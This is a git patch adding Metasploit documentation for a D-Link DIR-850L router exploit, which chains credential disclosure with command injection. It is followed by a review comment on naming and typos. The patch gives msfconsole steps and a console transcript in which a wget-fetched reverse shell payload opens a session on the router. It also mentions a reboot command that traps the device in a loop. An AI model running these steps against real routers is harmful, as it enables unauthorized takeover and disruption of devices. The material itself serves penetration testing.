From caad1bbf271f27cbd22334bb2cc5e1288bc4d6a0 Mon Sep 17 00:00:00 2001 From: Austin <30811388+realoriginal@users.noreply.github.com> Date: Thu, 2 Nov 2017 15:54:45 -0400 Subject: [PATCH] Create dlink_dir850l_unauth_exec.md --- .../linux/http/dlink_dir850l_unauth_exec.md | 40 +++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md diff --git a/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md b/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md new file mode 100644 index 0000000000..dc8863c9d1 --- /dev/null +++ b/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md 
@@ -0,0 +1,40 @@ +The module dlink_dir850_(un)auth_exec leverages an unauthenticated credential disclosure vulneralbility to then execute arbitrary commands via an authenticated OS command injection +vulneralbility. D-LINK 850L (excluding "Cloud" models) devices with firmware version up to 1.14B07 +are potentially vulnerable. The vulneralbility seems to occur within the parsing of the config. Another PoC can be found here https://www.seebug.org/vuldb/ssvid-96333. Setting command to be `reboot` will force the router into an infinite loop. + +## Vulnerable Application + + + 1. Start msfconsole + 2. Do : `use exploit/linux/http/dlink_dir850l_unauth_exec.rb` + 3. Do : `set RHOST [RouterIP]` + 4. Do : `set PAYLOAD linux/mipsle/shell/reverse_tcp` + 5. Do : `run` + 6. If router is vulnerable, payload should be dropped via wget and executed, and therein should obtain an session + + +## Example + +``` +msf > use exploit/linux/http/dlink_850l_unauth_exec +msf exploit(dlink_850l_unauthenticated_exec) > set RHOST 192.168.0.14 +RHOST => 192.168.0.14 +msf exploit(dlink_850l_unauthenticated_exec) > set RPORT 80 +RPORT => 80 +msf exploit(dlink_850l_unauthenticated_exec) > set LHOST ens3 +LHOST => ens3 +msf exploit(dlink_850l_unauthenticated_exec) > set LPORT 1351 +LPORT => 1351 +msf exploit(dlink_850l_unauthenticated_exec) > run + +[*] Started reverse TCP handler on 192.168.0.11:1351 +[*] 192.168.0.14:80 - Initiating exploitation... +[*] Using URL: http://0.0.0.0:80/Muw2WNUEmsAlcdl +[*] Local IP: http://192.168.0.11:80/Muw2WNUEmsAlcdl +[*] 192.168.0.14:80 - Retrieving uid and auth challenge... +[*] Command Stager progress - 100.00% done (101/101 bytes) +[*] Client 192.168.0.14 (Wget) requested /Muw2WNUEmsAlcdl +[*] Sending payload to 192.168.0.14 (Wget) +[*] Command shell session 2 opened (192.168.0.11:1351 -> 192.168.0.14:55167) at 2017-11-02 15:37:06 -0400 +[*] Server stopped. +```
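Review bot: the module name is inconsistent within the new file and does not match the path being added. The intro calls it `dlink_dir850_(un)auth_exec`, step 2 uses `exploit/linux/http/dlink_dir850l_unauth_exec.rb` (a `use` path is given without the `.rb` extension), and the example session uses `exploit/linux/http/dlink_850l_unauth_exec` with a `dlink_850l_unauthenticated_exec` prompt; use the documented module path `exploit/linux/http/dlink_dir850l_unauth_exec` throughout, and make the example transcript match it. Also fix "vulneralbility" (three occurrences) to "vulnerability" and "obtain an session" to "obtain a session". The numbered steps sit under "## Vulnerable Application" but describe how to run the module rather than the affected device; move the affected-firmware sentence ("D-LINK 850L ... up to 1.14B07") under that heading and put the steps under a "## Verification Steps" heading, per the usual module documentation layout. The `reboot` caveat at the end of the intro would be more visible as its own sentence next to the steps, since it describes a setting that can leave the device in an infinite reboot loop.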